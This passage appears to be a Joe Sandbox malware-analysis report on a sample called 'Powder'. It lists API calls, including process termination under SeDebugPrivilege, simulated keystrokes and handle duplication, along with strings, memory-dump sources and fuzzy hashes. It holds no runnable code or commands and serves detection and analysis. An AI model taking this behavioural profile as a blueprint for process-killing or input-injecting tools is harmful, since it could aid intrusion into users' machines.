                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                  • String ID: close all
                                                  • API String ID: 469580280-3243417748
                                                  • Opcode ID: 4f04f8dc679ebed6d49b1d2965d87bad07737be802c96c34c72b65f348dc8f43
                                                  • Instruction ID: 92bde323bea62fd25fe10174d5d6814d2acd6906158fbc89b93fc00837fd8864
                                                  • Opcode Fuzzy Hash: 4f04f8dc679ebed6d49b1d2965d87bad07737be802c96c34c72b65f348dc8f43
                                                  • Instruction Fuzzy Hash: A8A17070701212CFCB29EF14D494A69F3A0FF04744F5462ADE90ABB292CB31AD96CF91
                                                  APIs
                                                  • EnumChildWindows.USER32(?,00E5B13A), ref: 00E5B078
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ChildEnumWindows
                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                  • API String ID: 3555792229-1603158881
                                                  • Opcode ID: 86290ac9f143a0f962fc9354db19b014f8e24417bf67218a883e75d74f7cc2ca
                                                  • Instruction ID: 77b331fcb736971b7a3beab841e3312d84d3d2d175669735c7d38d0aea8d78eb
                                                  • Opcode Fuzzy Hash: 86290ac9f143a0f962fc9354db19b014f8e24417bf67218a883e75d74f7cc2ca
                                                  • Instruction Fuzzy Hash: D091A470600115EACB08DF60C482BEEFBB5BF04305F18A529ED5AB7291DF30699DCBA1
                                                  APIs
                                                  • SetWindowLongW.USER32(?,000000EB), ref: 00E0327E
                                                    • Part of subcall function 00E0218F: GetClientRect.USER32(?,?), ref: 00E021B8
                                                    • Part of subcall function 00E0218F: GetWindowRect.USER32(?,?), ref: 00E021F9
                                                    • Part of subcall function 00E0218F: ScreenToClient.USER32(?,?), ref: 00E02221
                                                  • GetDC.USER32 ref: 00E3D073
                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E3D086
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00E3D094
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00E3D0A9
                                                  • ReleaseDC.USER32(?,00000000), ref: 00E3D0B1
                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E3D13C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                  • String ID: U
                                                  • API String ID: 4009187628-3372436214
                                                  • Opcode ID: 25edd999c43749d0840fcc0d75850ef41392b5762add9e6f4fb9487d1bf66b5f
                                                  • Instruction ID: 2bd4fcb2f5a451bc9b07f9215cccf6a7c61b27e306bf439b155bc134e0b2339a
                                                  • Opcode Fuzzy Hash: 25edd999c43749d0840fcc0d75850ef41392b5762add9e6f4fb9487d1bf66b5f
                                                  • Instruction Fuzzy Hash: 15710430408205DFCF259F64DC88AEA7FB6FF49324F14526AED557A1A5C7318882DF60
                                                  APIs
                                                    • Part of subcall function 00E029E2: GetWindowLongW.USER32(?,000000EB), ref: 00E029F3
                                                    • Part of subcall function 00E02714: GetCursorPos.USER32(?), ref: 00E02727
                                                    • Part of subcall function 00E02714: ScreenToClient.USER32(00EC77B0,?), ref: 00E02744
                                                    • Part of subcall function 00E02714: GetAsyncKeyState.USER32(00000001), ref: 00E02769
                                                    • Part of subcall function 00E02714: GetAsyncKeyState.USER32(00000002), ref: 00E02777
                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00E8C69C
                                                  • ImageList_EndDrag.COMCTL32 ref: 00E8C6A2
                                                  • ReleaseCapture.USER32 ref: 00E8C6A8
                                                  • SetWindowTextW.USER32(?,00000000), ref: 00E8C752
                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E8C765
                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00E8C847
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                  • API String ID: 1924731296-2107944366
                                                  • Opcode ID: 3c3069ae7ab17858c1be3e0d368dcf8f83a32c39e4dbc7cbd39a3f86b0cb96fc
                                                  • Instruction ID: 237c0173eda7bf4a402b55af4c45876131190910034684a3944fd048100a0da8
                                                  • Opcode Fuzzy Hash: 3c3069ae7ab17858c1be3e0d368dcf8f83a32c39e4dbc7cbd39a3f86b0cb96fc
                                                  • Instruction Fuzzy Hash: B551BE71108304AFD704EF24CC5AFAA7BE5EB84314F10552EFA99A72E1CB71A949CF61
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00E90980), ref: 00E79412
                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00E90980), ref: 00E79446
                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E795C0
                                                  • SysFreeString.OLEAUT32(?), ref: 00E795EA
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                  • String ID:
                                                  • API String ID: 560350794-0
                                                  • Opcode ID: 8eef880d48f86e78be2d1f5e114eb38fb73e83cea6b02fdfa2e85f918a34eb74
                                                  • Instruction ID: d2b8557064204838fb7dc307257ec3579519d0a6c1ad3674479e90e79868c78f
                                                  • Opcode Fuzzy Hash: 8eef880d48f86e78be2d1f5e114eb38fb73e83cea6b02fdfa2e85f918a34eb74
                                                  • Instruction Fuzzy Hash: EFF13A71A00219EFCB14DFA4C884EAEB7B9FF45315F109059F91ABB251DB31AE45CB60
                                                  APIs
                                                    • Part of subcall function 00E64BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E63B8A,?), ref: 00E64BE0
                                                    • Part of subcall function 00E64BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E63B8A,?), ref: 00E64BF9
                                                    • Part of subcall function 00E64FEC: GetFileAttributesW.KERNEL32(?,00E63BFE), ref: 00E64FED
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00E652FB
                                                  • _wcscmp.LIBCMT ref: 00E65315
                                                  • MoveFileW.KERNEL32(?,?), ref: 00E65330
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                  • String ID:
                                                  • API String ID: 793581249-0
                                                  • Opcode ID: 94ba6b60a536d2054f59e751f979bbea4c8dbc5c6f8d4cfb739fe5f778054606
                                                  • Instruction ID: c97680c186f9eb8bcea3577c55a9f439772156a264d174970890f447b86e941a
                                                  • Opcode Fuzzy Hash: 94ba6b60a536d2054f59e751f979bbea4c8dbc5c6f8d4cfb739fe5f778054606
                                                  • Instruction Fuzzy Hash: CC5187B21487455BC764DB60EC819DFB7ECAF85340F50191EF285E3152EF34A688C756
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E88D24
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: c9ca2f7be3595b03a67df03f4adbb97b088d22fe56a38ec245b03163d78a8513
                                                  • Instruction ID: d0eae80a069e2846a8af348c45950043bad63144cf3ef96ed7f6b6929937271c
                                                  • Opcode Fuzzy Hash: c9ca2f7be3595b03a67df03f4adbb97b088d22fe56a38ec245b03163d78a8513
                                                  • Instruction Fuzzy Hash: F151B130640204BFEB24BF24CE89B997BA4AB04314FA46516FE5DF71E1CF71A990CB51
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E3C638
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E3C65A
                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E3C672
                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E3C690
                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E3C6B1
                                                  • DestroyIcon.USER32(00000000), ref: 00E3C6C0
                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E3C6DD
                                                  • DestroyIcon.USER32(?), ref: 00E3C6EC
                                                    • Part of subcall function 00E8AAD4: DeleteObject.GDI32(00000000), ref: 00E8AB0D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                  • String ID:
                                                  • API String ID: 2819616528-0
                                                  • Opcode ID: d4241ec628f7950c7a956200d682f8612c871acfd58484cc83b89135ffea3a2e
                                                  • Instruction ID: a5462852a2ca174dccb0e66995ffcad03006bac0c474c87b76baa7d57a6b51af
                                                  • Opcode Fuzzy Hash: d4241ec628f7950c7a956200d682f8612c871acfd58484cc83b89135ffea3a2e
                                                  • Instruction Fuzzy Hash: 2F51787060020AAFDB24DF25CC49BAA7BF5EB48754F20552EFA42B72D0DB71E890DB50
                                                  APIs
                                                    • Part of subcall function 00E5B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E5B54D
                                                    • Part of subcall function 00E5B52D: GetCurrentThreadId.KERNEL32 ref: 00E5B554
                                                    • Part of subcall function 00E5B52D: AttachThreadInput.USER32(00000000,?,00E5A23B,?,00000001), ref: 00E5B55B
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E5A246
                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E5A263
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00E5A266
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E5A26F
                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E5A28D
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E5A290
                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E5A299
                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E5A2B0
                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E5A2B3
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                  • String ID:
                                                  • API String ID: 2014098862-0
                                                  • Opcode ID: bcc9c27a826323f0e6d075307a08ae15ed2969d9871aee9090ef2313596e5234
                                                  • Instruction ID: 3e507521893a6b97b34a15944347459d5831afa3db14ea569b37c05dd299ae78
                                                  • Opcode Fuzzy Hash: bcc9c27a826323f0e6d075307a08ae15ed2969d9871aee9090ef2313596e5234
                                                  • Instruction Fuzzy Hash: E51121B1900208BEF6106F628C8AF6A7B2DEB4C751F90141AF7107B0E0CAF35C108AA0
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E5915A,00000B00,?,?), ref: 00E594E2
                                                  • HeapAlloc.KERNEL32(00000000,?,00E5915A,00000B00,?,?), ref: 00E594E9
                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E5915A,00000B00,?,?), ref: 00E594FE
                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00E5915A,00000B00,?,?), ref: 00E59506
                                                  • DuplicateHandle.KERNEL32(00000000,?,00E5915A,00000B00,?,?), ref: 00E59509
                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E5915A,00000B00,?,?), ref: 00E59519
                                                  • GetCurrentProcess.KERNEL32(00E5915A,00000000,?,00E5915A,00000B00,?,?), ref: 00E59521
                                                  • DuplicateHandle.KERNEL32(00000000,?,00E5915A,00000B00,?,?), ref: 00E59524
                                                  • CreateThread.KERNEL32(00000000,00000000,00E5954A,00000000,00000000,00000000), ref: 00E5953E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                  • String ID:
                                                  • API String ID: 1957940570-0
                                                  • Opcode ID: 69f290456ac9eec656da69c65dbacd2c123753b2f590e1e0f84c6ea9fe788da7
                                                  • Instruction ID: 69d2f844b0b138dfa9346d979304e64eb05529ca81eb1b8a15674906472c83ae
                                                  • Opcode Fuzzy Hash: 69f290456ac9eec656da69c65dbacd2c123753b2f590e1e0f84c6ea9fe788da7
                                                  • Instruction Fuzzy Hash: A201CDB5241304BFE710AFA6DC4DF6B7BACEB89711F404412FA05EB1A1DA709804CB34
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                  • API String ID: 0-572801152
                                                  • Opcode ID: fdf7ae17d0ec1df357b8858ace655ace271329b17a86af741baf079eb00088ed
                                                  • Instruction ID: d254a33f555eaffdebf497546b3d05416b5b6aa2ae7ba34d99f5c6033708a596
                                                  • Opcode Fuzzy Hash: fdf7ae17d0ec1df357b8858ace655ace271329b17a86af741baf079eb00088ed
                                                  • Instruction Fuzzy Hash: 38C1A271A0021AAFDF14CFA8D884AAEB7F5FB88314F18D479E919B7281E7709D44CB51
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$_memset
                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                  • API String ID: 2862541840-625585964
                                                  • Opcode ID: 8e0f16cef7b852e1b0acb14b934fe10e56d8316f4f1a60893a6d390220a800a7
                                                  • Instruction ID: 46a1b1a9aad3061804305684e6850a755dad14303d65484448a10346e3a9fcf3
                                                  • Opcode Fuzzy Hash: 8e0f16cef7b852e1b0acb14b934fe10e56d8316f4f1a60893a6d390220a800a7
                                                  • Instruction Fuzzy Hash: 7B919D70A00219AFDF24CFA5C844FEEBBB8EF85714F10955EE519BB282D7709944CBA0
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E87449
                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00E8745D
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E87477
                                                  • _wcscat.LIBCMT ref: 00E874D2
                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E874E9
                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E87517
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window_wcscat
                                                  • String ID: SysListView32
                                                  • API String ID: 307300125-78025650
                                                  • Opcode ID: 28f453b7507268f1649dcb4edcb21af381035e88203cc0e842f2e92750b5ecf5
                                                  • Instruction ID: 044bd18c74e3dbaed2576ce9b8ce9a95d5760bd31017ea53b706090f76181ca1
                                                  • Opcode Fuzzy Hash: 28f453b7507268f1649dcb4edcb21af381035e88203cc0e842f2e92750b5ecf5
                                                  • Instruction Fuzzy Hash: 6141A171504308AFDB21AF64CC85BEA77E8EF08354F10542AF998B6191D671DD84CB50
                                                  APIs
                                                    • Part of subcall function 00E64148: CreateToolhelp32Snapshot.KERNEL32 ref: 00E6416D
                                                    • Part of subcall function 00E64148: Process32FirstW.KERNEL32(00000000,?), ref: 00E6417B
                                                    • Part of subcall function 00E64148: CloseHandle.KERNEL32(00000000), ref: 00E64245
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E7F08D
                                                  • GetLastError.KERNEL32 ref: 00E7F0A0
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E7F0CF
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E7F14C
                                                  • GetLastError.KERNEL32(00000000), ref: 00E7F157
                                                  • CloseHandle.KERNEL32(00000000), ref: 00E7F18C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2533919879-2896544425
                                                  • Opcode ID: 2d2be03382c18e528f0f22d4e98e426f4674707ef2849b824b75d9eb9acc60f7
                                                  • Instruction ID: dff08f388a0f0256586cd2408962bf22fbb6c8ba013fcd4422ef0d91984281de
                                                  • Opcode Fuzzy Hash: 2d2be03382c18e528f0f22d4e98e426f4674707ef2849b824b75d9eb9acc60f7
                                                  • Instruction Fuzzy Hash: BD41DE71201201DFDB11EF24DC95FADB7E5AF80714F449419F94AAB2D3CB70A848CB95
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E64802
                                                  • LoadStringW.USER32(00000000), ref: 00E64809
                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E6481F
                                                  • LoadStringW.USER32(00000000), ref: 00E64826
                                                  • _wprintf.LIBCMT ref: 00E6484C
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E6486A
                                                  Strings
                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00E64847
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                  • API String ID: 3648134473-3128320259
                                                  • Opcode ID: 748225866430acbcbadc24d98dd65d31203dffc64a92c5c6d05f32f224251e54
                                                  • Instruction ID: 63a1fb22923bdefb991f0fa600fddc1db60c7510d25722958ea2983640fd2ee6
                                                  • Opcode Fuzzy Hash: 748225866430acbcbadc24d98dd65d31203dffc64a92c5c6d05f32f224251e54
                                                  • Instruction Fuzzy Hash: 790144F29403087FE75197A19D89EF6776CEB48300F400597B749F2041E7749E884B75
                                                  APIs
                                                    • Part of subcall function 00E029E2: GetWindowLongW.USER32(?,000000EB), ref: 00E029F3
                                                  • GetSystemMetrics.USER32(0000000F), ref: 00E8DB42
                                                  • GetSystemMetrics.USER32(0000000F), ref: 00E8DB62
                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00E8DD9D
